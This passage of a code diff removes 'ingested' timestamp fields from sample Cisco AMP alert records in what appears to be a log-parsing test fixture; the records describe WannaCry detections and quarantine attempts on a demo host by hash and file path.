pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -6276,7 +6199,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212788539Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -6352,7 +6274,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212789347Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -6428,7 +6349,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212790156Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -6504,7 +6424,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212791128Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -6582,7 +6501,6 @@ ], "code": "1090519054", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212791933Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":3200,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", "severity": 2 
@@ -6681,7 +6599,6 @@ ], "code": "1090519054", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212792804Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":235000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2708,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "severity": 2 
@@ -6778,7 +6695,6 @@ ], "code": "1090519054", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212793633Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":172000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -6862,7 +6778,6 @@ ], "code": "553648143", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212794454Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -6938,7 +6853,6 @@ ], "code": "2164260880", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212795270Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -7014,7 +6928,6 @@ ], "code": "2164260880", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212796097Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -7090,7 +7003,6 @@ ], "code": "2164260880", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212796916Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":33000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -7164,7 +7076,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212797767Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 
@@ -7254,7 +7165,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212798740Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 
@@ -7344,7 +7254,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212799554Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 
@@ -7434,7 +7343,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212800372Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 
@@ -7524,7 +7432,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212801185Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":876000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 
@@ -7614,7 +7521,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212802021Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":845000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat 